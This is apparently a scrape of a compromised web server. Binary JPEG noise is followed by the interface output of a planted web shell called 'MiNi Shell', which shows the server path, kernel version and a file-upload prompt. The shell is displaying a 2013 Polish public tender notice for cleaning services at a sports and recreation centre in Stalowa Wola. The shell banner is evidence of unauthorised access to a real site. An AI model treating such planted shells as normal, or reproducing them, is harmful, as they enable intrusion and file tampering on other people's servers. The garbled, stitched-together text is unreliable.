JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131121/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131121/247631-N-2013.html

<p class="kh_header"><b>Stalowa Wola: Wykonanie usług porządkowych w zakresie kompleksowego utrzymania czystości 
w obiektach: sportowo-rekreacyjnym, administracyjnym, basenach krytych i odkrytych dla MOSiR w Stalowej Woli</b><br>
<b>Numer ogłoszenia: 247631 - 2013; data zamieszczenia: 21.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Hutnicza 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 8422562, 8447338, faks 015 8422562, 8447338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mosir.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług porządkowych w zakresie kompleksowego utrzymania czystości 
w obiektach: sportowo-rekreacyjnym, administracyjnym, basenach krytych i odkrytych dla MOSiR w Stalowej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Utrzymanie czystości w obiektach MOSiR, tj. budynku administracyjnym, przewiązce między halą sportową a budynkiem admin., hali sportowej, przewiązce między halą
sport. a małą salą sportową, obiektem pływalni krytych, terenem pływalni okrytych. Utrzymanie czystości i odśnieżanie (usuwanie oblodzeń) wyszczególnionych w Załączniku nr 2 do SIWZ schodów, podjazdów i podestów. Pow. realizacji usług
~54709 m2.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Możliwe powtórzenie zakresu prac w styczniu oraz częściowo w lutym 2015r. wg Załącznika nr 2 do SIWZ, znak MOSiR/ZP/06/2013.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie przewiduje się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie przewiduje się</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie
zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał usługę w
zakresie utrzymania czystości, w co najmniej jednym obiekcie, w którym prowadzona jest działalność sportowo-rekreacyjna
włącznie z usługą udostępniania pływalni krytej i odkrytej o powierzchni min 5000 m 2, trwającą nie
krócej niż 12 m-cy w ramach jednego kontraktu oraz pomieszczeniach saun mokrych i suchych a także sal
sportowych lub szkolnych, w których posadzka wykonana jest z deszczułek drewnianych zabezpieczonych
lakierem do podłóg sportowych. Rozstrzygnięcie warunku na zasadzie: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca udokumentuje, że dysponuje lub na czas realizacji zamówienia będzie
dysponował: -/ sprzętem i środkami do odkurzania, zamiatania, czyszczenia: wykładzin, paneli, posadzek:
lastrykowych, terakotowych, drewnianych, betonowych, zgodnie z zapisami zawartymi w załączniku nr 2 do SIWZ,
w części: Pozostałe istotne warunki zamówienia, -/ sprzętem i materiałami do pokrywania powierzchni podłóg typu
panele, wykładziny, lastriko, posadzki drewniane powłokami konserwującymi, zgodnie z zapisami zawartymi w
załączniku nr 2 do SIWZ, w części: Pozostałe istotne warunki zamówienia. Ww. sprzęt i środki winny spełniać
normy obowiązujące na terenie Wspólnoty Europejskiej, a co za tym idzie posiadać odpowiednie certyfikaty i
zaświadczenia. Rozstrzygnięcie warunku na zasadzie: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca udokumentuje, że dysponuje lub na czas realizacji zamówienia
będzie dysponował personelem złożonym z osób wyszkolonych, doświadczonych i kompetentnych w zakresie
wykonywania usług będących przedmiotem zamówienia, przy czym Zamawiający zastrzega minimalną ilość
pracowników, wynoszącą 14 osób zatrudnionych do wykonywania usługi, w sprawie, której toczy się postępowanie,
zgodnie z zapisami zawartymi w załączniku nr 2 do SIWZ, w części: Pozostałe istotne warunki zamówienia.
Rozstrzygnięcie warunku na zasadzie: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca udokumentuje posiadanie opłaconej polisy na kwotę nie mniejszą niż
200 000,00 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od
odpowiedzialności cywilnej na ww. kwotę w zakresie prowadzonej działalności związanej z przedmiotem umowy
oraz przedstawi pisemne zobowiązanie, że przedłuży polisę w podanej wysokości na okres trwania usługi a kopię
zawartej polisy dostarczy niezwłocznie Zamawiającemu z dopiskiem (Za zgodność z oryginałem) oraz podpisami i
pieczęciami jakie wymagane są na dokumentach dołączanych do oferty Wykonawcy w niniejszym postępowaniu.
Rozstrzygnięcie warunku na zasadzie: spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) ofertę cenową (Cześć pierwsza formularza, Część druga formularza) - Załącznik nr 1 do SIWZ, o której mowa w Rozdz. IV
pkt 1.4 SIWZ. W przypadku składania oferty wspólnej należy złożyć jeden dokument. b) pełnomocnictwo, o którym mowa w
Rozdz. III pkt 4.2 i 4.3 SIWZ (w przypadku Wykonawców składających ofertę wspólną) jako Załącznik nr 16. W przypadku
składania oferty wspólnej należy złożyć jeden dokument. c) Oświadczenie Wykonawcy o przedłużeniu polisy - Załącznik nr 7
do SIWZ, o którym mowa w Rozdz. III pkt 2.1 lit g) SIWZ - zaakceptowany zgodnie z wymaganiami SIWZ. (jak pozostałe
dokumenty: miejscowość, data, pieczątka i parafka lub czytelny podpis). W przypadku składania oferty wspólnej w/w
dokumenty składa każdy z Wykonawców składających ofertę wspólną. d) Oświadczenie Wykonawcy o zapoznaniu się z
SIWZ, szczegółowym opisem zamówienia oraz pozostałymi załącznikami do SIWZ - Załącznik nr 6 do SIWZ. W przypadku
składania oferty wspólnej ww. dokumenty składa każdy z Wykonawców składających ofertę wspólną. e) podwykonawcy -
Załącznik nr 11 do SIWZ. W przypadku składania oferty wspólnej należy złożyć jeden dokument. f) Wzór umowy stanowiący
Załącznik nr 12 do SIWZ - zaakceptowany zgodnie z wymaganiami SIWZ. (jak pozostałe dokumenty: miejscowość, data,
pieczątka i parafka lub czytelny podpis). W przypadku składania oferty wspólnej należy złożyć jeden dokument. g)
Szczegółowy opis przedmiotu zamówienia stanowiący Załącznik nr 2 do SIWZ. W przypadku składania oferty wspólnej należy
złożyć jeden dokument. UWAGA: Wszystkie ww. dokumenty należy wypełnić i załączyć do oferty z wyjątkiem pełnomocnictwa
(Rozdz. III pkt 3.8 lit b)), jeżeli nie dotyczy. W przypadku braku podwykonawców (Rozdz. III pkt 3.8 lit. e)) załączony dokument
należy przekreślić, opisać (NIE DOTYCZY) i podpisać zgodnie z wymaganiami SIWZ jak pozostałe dokumenty (miejscowość,
data, pieczątka i parafka lub czytelny podpis). Oświadczenie Wykonawcy o przedłużeniu polisy (Rozdz. III pkt 3.8 lit c)),
należy podpisać zgodnie z wymaganiami SIWZ jak pozostałe dokumenty (miejscowość, data, pieczątka i parafka lub czytelny
podpis) ze względu na możliwość przesunięcia się terminu realizacji usługi zgodnie z Rozdz. I pkt 7.5 lit a) niniejszej SIWZ.</p><p><b>III.7)</b><p>
<p><b>ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne</b> - należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach </p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Dokument potwierdzający stosowanie przez wykonawcę działań zgodnych z europejskimi normami jakościowymi, np. certyfikat jakości - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. a) zmiana wielkości zamówienia, wliczając w to zamówienia uzupełniające zgodnie z art. 67 ust. 1, pkt 6 ustawy oraz
zmianę terminów wykonywana części lub całości usługi w zależności od:- warunków pogodowych, - decyzji organów
odpowiedzialnych za dopuszczenie poszczególnych obiektów bądź ich części do użytkowania (np. Powiatowa Stacja
Sanitarno-Epidemiologiczna, Nadzór Budowlany, PIP), - terminu zakończenia prowadzonego postępowania, a tym samym
terminu podpisania umowy z Wykonawcą, - zmian w przepisach mających wpływ na niniejsze zamówienie, - awarii lub
uszkodzeń; urządzeń, instalacji, budynków lub budowli, itp. mających wpływ na niniejsze zamówienie (np. zalania
pomieszczeń wodą z instalacji wodociągowej, z instalacji odwadniającej bądź ściekami z inst. kanalizacyjnej, brak prądu,
niedopuszczenie do użytku budynku-budowli uszkodzonych), - prac budowlanych lub innych mających wpływ na niniejsze
zamówienie, a wielkości tego wpływu nie można było określić w momencie sporządzania niniejszego SIWZ, - kataklizmów
(np. trąby powietrzne, podtopienia, trzęsienia ziemi) i innych czynników wywołanych zjawiskami zachodzącymi w przyrodzie,
których nie można było przewidzieć w momencie sporządzania SIWZ, - skażeń i innych katastrof wywołanych przez
działalność człowieka mających wpływ na realizację niniejszego zamówienia, - innych czynników, których nie dało się
przewidzieć w chwili sporządzania SIWZ, zgodnie z art. 144 ust. 1 ustawy. Zamówienie uzupełniające zgodnie z art. 67 ust. 1, pkt 6 ustawy Zamawiający może zastosować m.in. w przypadku, gdy w skutek przedłużenia się procedur dotyczących wyboru Wykonawcy na rok 2015 straci ważność umowa z Wykonawcą na rok 2014. Wielkość zamówień uzupełniających do 14,99 % zamówienia podstawowego, b) zmian obligatoryjnych wynikających ze zmian przepisów prawa, niezależnych od stron, c)
zmianę osób wskazanych w ofercie Wykonawcy, wyłącznie za zgodą Zamawiającego wyrażoną w formie pisemnej, pod
warunkiem posiadania przez te osoby, co najmniej takich samych uprawnień i kwalifikacji zawodowych jak wymagane przez
przepisy prawa w tym zakresie, d) zmianę Koordynatorów z uwagi na chorobę, urlop, sytuacje losowe itp. e) zmian
nieistotnych, zgodnie z treścią art. 144 ust. 1 Ustawy, f) zmian na skutek zdarzenia niezależnego od Zamawiającego, np.:
decyzji organu administracji, orzeczenia sądowego, bezpośrednio wpływającego na przedmiot zamówienia, w zakresie
objętym decyzją lub orzeczeniem sądu, g) zmian danych teleadresowych, np.: siedziby firmy, adresu do korespondencji,
numerów telefonów (stacjonarnych i komórkowych) wynikających z bieżących umów i potrzeb, h) zmianę podwykonawców
wskazanych w ofercie Wykonawcy, wyłącznie za zgodą Zamawiającego o ile nie zmieni to warunków SIWZ, i) podzlecanie
robót przez Wykonawcę Podwykonawcom w zakresie nieokreślonym w ofercie Wykonawcy w trakcie realizacji przedmiotu
umowy będzie mogło nastąpić za pisemną zgodą Zamawiającego i o ile nie zmieni to warunków SIWZ wyrażoną w formie
pisemnej, j) w przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy organizacyjno-prawnej Wykonawcy,
zmiana firmy, pod którą działa Wykonawca, zmiana osoby uprawnionej do składania oświadczeń w imieniu Wykonawcy,
powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, w zakresie
dokonanych zmian strukturalnych, k) możliwość dokonania każdej ze zmian, np.: w zakresie przedmiotu umowy, terminu
wykonania przedmiotu umowy w przypadku, gdy z uwagi na liczne przeszkody spowodowane na skutek siły wyższej
wykonanie umowy stało się niemożliwe. Przez siłę wyższą należy rozumieć zdarzenie zewnętrzne, wynikłe po podpisaniu
umowy, którego nie można było przewidzieć, uniknąć ani jemu zapobiec przy zachowaniu wszelkich należytych środków,
niezależnie od stron umowy. Zdarzeniami siły wyższej są między innymi takie zdarzenia jak: klęski żywiołowe, anomalie
klimatyczne, upadki meteorytów, wojny, rewolucje, zamachy stanu, akty terrorystyczne, konfiskaty, nacjonalizacje i inne
podobne wydarzenia lub decyzje władz państwowych oraz w przypadkach wymienionych w pkt. 1 lit. a) Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią
jednocześnie zobowiązania do wyrażenia takiej zgody. Dokonanie zmian, o których mowa powyżej, wymaga formy pisemnej
pod rygorem nieważności. 2. Zamawiający przed wprowadzeniem zmian w umowie wymienionych w pkt 1 lit. a), b), f), j), k)
sporządza protokół, w którym podaje: przyczynę ich wprowadzenia oraz inne informacje, które Zamawiający uzna za
niezbędne lub załącza odpowiedni dokument, jeżeli zmiany są wynikiem np. nakazu organów jak w pkt 1 W przypadku zmian
wymienionych w pkt 1 lit c), d), e), g), h), i) wymagane jest jedynie sporządzenie notatki służbowej lub załączenie kopii
korespondencji. Ponadto zmiany umowy w zakresie wymienionym w pkt 1 wymagają formy pisemnej pod rygorem
nieważności, tj. spisaniem aneksu i jego pisemnej akceptacji przez obydwie ze stron. W przypadku zamówień
uzupełniających obowiązuje procedura w trybie (Z wolnej ręki) zgodnie z ustawą pzp. 3. Rozliczenie za zmianę zakresu usług
nastąpi na podstawie Załącznika nr 1, Część druga formularza oraz Załącznika nr 2 do niniejszej SIWZ, wg zasad jak niżej: a)
Skrócenie lub wydłużenie terminu wykonywania usługi o określony w aneksie do umowy m-c kalendarzowy w danym zakresie
wymienionym w Załączniku nr 1, Część druga formularza, spowoduje zmniejszenie lub zwiększenie wynagrodzenia
Wykonawcy o wpisaną przez niego do ww. załącznika kwotę w danym miesiącu. b) Gdy zmiana zakresu usług dotyczy tylko
jednego obiektu (np. hala sportowa), zakresu pomieszczeń (np. zespół szatni) bądź innych wyszczególnionych miejsc (np.
powierzchnia schodów). Należy wyliczyć z ww. załączników cenę za metr kwadratowy usługi w danym miesiącu i w danym
zakresie a następnie odczytać ilość metrów kwadratowych, o jakie zostanie zwiększona lub pomniejszona usługa w danym
miesiącu i zakresie. Iloczyn ilości metrów, o jakie zostanie zwiększona lub pomniejszona usługa i ceny za metr kwadratowy
daje kwotę zmniejszenia lub zwiększenia ceny usługi w danym miesiącu i zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mosir.stalowawola.pl/przetargi.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, 37-450
Stalowa Wola, ul. Hutnicza 15, sekretariat (pierwsze piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, 37-450 Stalowa Wola, ul. Hutnicza 15, sekretariat (pierwsze piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com